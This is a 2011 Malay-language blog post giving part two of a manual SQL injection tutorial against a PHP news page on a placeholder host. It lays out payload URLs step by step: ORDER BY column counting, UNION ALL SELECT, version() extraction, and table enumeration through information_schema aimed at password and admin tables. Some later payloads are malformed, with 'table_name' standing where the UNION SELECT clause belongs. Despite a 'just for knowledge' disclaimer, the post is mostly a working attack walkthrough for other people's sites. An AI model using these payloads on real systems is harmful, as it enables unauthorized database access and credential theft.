Friday, June 10, 2011

SQLi part II Manual Tutorial.

Written by   on   in , , , , , , , , ,   with No comments
Harini nak tulis pulak pasal hacking.. hehehe.. sambungan dari manual SQLi ingat lagi tak? SINI beleh klik pada link tuh.. ni sebenarny just tutor jer ok.. kalau betul korang nak buat.. huhuhuhu.. tak payah la, sekadar tahu sudah la ea? hehehehe..

Kite street jer ok.. satu lagi nak bagitahu.. step2 ni just sampai pada kita dapat tahu table2 dia dan column dia.. tapi tak semua betul dari ape yang dah kita buat, memang benda ni susah dan perlukan kesabaran serta ketelitian (amboi).. tapi bile korang perati betol2 memang tak susah dah, mende ni wadud praktek nak dekat setaun.. dan jugak, pada yang dah pro.. sila la tinggalkan bagi yang lebih memerlukan.. ^_^

Kalau korang dah refer pada link SINI dan korang boleh paham dari situ.. insyaallah step2 lepas ni lagi mudah sebab wadud dah sertakan gambar sekali.. lagipun dulu time dok praktek2 ni.. tutor yang wadud baca mana penah ada gambar.. paling2 link dari site target jer drang tunjukkan..

Ok lepas kita dah jumpa site yang vuln teruskan dengan step2 mudah di bawah ni, ingat ketelitian korang sangat2 diperlukan :  (view gamba untuk besau)




1. Target kita : http://bla2.com/artikel/news.php?id=-19+order+by+9--

ps >> maaf target sebenar harus ditutup sebab untuk menjaga privasi orang lain.. ni kan just nak tahu jer.. hehehe.. tak baek la korang.. untuk penjelasan gambar diatas, site asal dia http://bla2.com/artikel/news.php?id=19 ok? yang diperlukan kat sini adalah kita perlu cari error untuk dapat acess order by, cara dia :

Lepas dapat error dari site tu dengan penambahan "- atau ' " http://bla2.com/artikel/news.php?id=-19+order+by+1-- dan seterusnya +order+by+2,3,4,5,6,7,8,9,10-- (buat satu2 bukan berderet macam tu) contoh :

-19+order+by+1--
-19+order+by+2--
-19+order+by+3-- dan seterusnya..

Buat sampai keluar error ok.. dan error yang keluar itulah untuk kita teruskan lagi misi kita (ekekeke).




2. Ok sekarang kita nak keluarkan angka dari error yang dah kita dapat tadi.. contoh error no 10 so kita amik nombor sebelum error jadi no 9. Buat perubahan atau gunakan perintah "+order+by+" kepada "+union+all+select". Contohnya macam ni :

asal : http://bla2.com/artikel/news.php?id=-19+order+by+9--

ubah : http://bla2.com/artikel/news.php?id=-19+union+all+select+1,2,3,4,5,6,7,8,9-- (tengok ada perubahan)

Lepas kita dah buat perubahan @ gunakan perintah tadi, tengok pada nombor yang keluar.. contoh dari yang wadud buat keluar no "3" dengan "8" pilih jer mana2 dari kedua tuh dari (+1,2,3,4,5,6,7,8,9--) jadi wadud amik no "3". (mark no 3) dan "8" pon boleh, terserah korang. No ni kita guna untuk tengok version dari web dia.. kalau 5 comunity (contoh) itu mudah, tapi kalau 4 kita kene guna schemafuzz tool la.. tu agak payah sikit..




3. lepas dah mark no 3, kita ubah no "3" menjadi "version()" untuk mendapatkan version dari web dia, macam penjelasan kat atas tadi. Contoh dari perubahan atau gunakan perintah "version()" kepada nombor "3" :

asal : http://bla2.com/artikel/news.php?id=-19+union+all+select+1,2,3,4,5,6,7,8,9--

ubah : http://bla2.com/artikel/news.php?id=-19+union+all+select+1,2,version(),4,5,6,7,8,9-- (lihat mana yang ubah dan mana yang tidak)

Ok dari ape yang dah wadud dapatkan, web dia guna "5.0.51a-24+lenny5" ertinye version 5 bukan 4. So berita baik kita boleh teruskan lagi.. hehehe.. sebab kalau 4 susah nak jelaskan, guna schemafuzz lagi..





4.Ok sekarang kita nak keluarkan table dari web dia, gunakan code atau perintah table_name (pada nombor keluar) dan "+from+information_schema.tables--" (letakkan setelah nombor 9) relax jangan penin.. contoh dia macam ni :

asal : http://bla2.com/artikel/news.php?id=-19+union+all+select+1,2,version(),4,5,6,7,8,9--

ubah : http://bla2.com/artikel/news.php?id=-19+table_name+1,2,version(),4,5,6,7,8,9+from+information_schema.tables--

So table yang keluar adalah character_sets (tengok gambar), jadi untuk keluarkan semua table kita kene gunakan perintah "group_concat(table_name)" dan "+from+information_schema.tables+where+table_schema=database()--"





5. Mana kita nak letak code2 tu? ok tengok contoh :

asal : http://bla2.com/artikel/news.php?id=-19+table_name+1,2,version(),4,5,6,7,8,9+from+information_schema.tables--

ubah : http://bla2.com/artikel/news.php?id=-19+group_concat(table_name)+1,2,version(),4,5,6,7,8,9+from+information_schema.tables+where+table_schema=database()--


Jadi table akan keluar lebih dari satu.. tengok elok2, sebab dari table lah kita dapatkan info-info penting dari web dia, contoh table yang keluar lepas wadud buat "cms_password, content,content_bigfoto, content_kat, miwon_menu" table yang rasa penting korang boleh tengok sendiri, macam password, admin, login dan sebagainya tergantung pada table yang korang dapat. Rasa tak perlu kot sampai semua korang geladah.. buang masa jer.. baik pakai table yang betol2 korang rasa oh kat sini mesti ada pasword dia.. tapi kalau korang dah rajin sangat.. go on la.. ^_^

Okeh.. dah penin rasa... sambung nanti pulak la ekh.. sebab lepas ni kita kene convert pulak setiap table yang kita rasa penting, kalau korang dah lepas sampai ke tahap ni.. kira ok dah.. ^_^ da boleh la nak dapat info2 penting dia.. tapi ingat, ni hanya untuk ilmu jer, bagi kotang lebih tahu.. hehehehe... kalau nanti wadud rajin, boleh la wat tutor menggunakan schemafuzz tool pulak la ea.. lagi best, korang just tunggu dan tunggu dah dapat.. tapi nak paham bagi la xpert sikit tutor manual ni, baru betol.. *_*
Share:

0 comments:

Post a Comment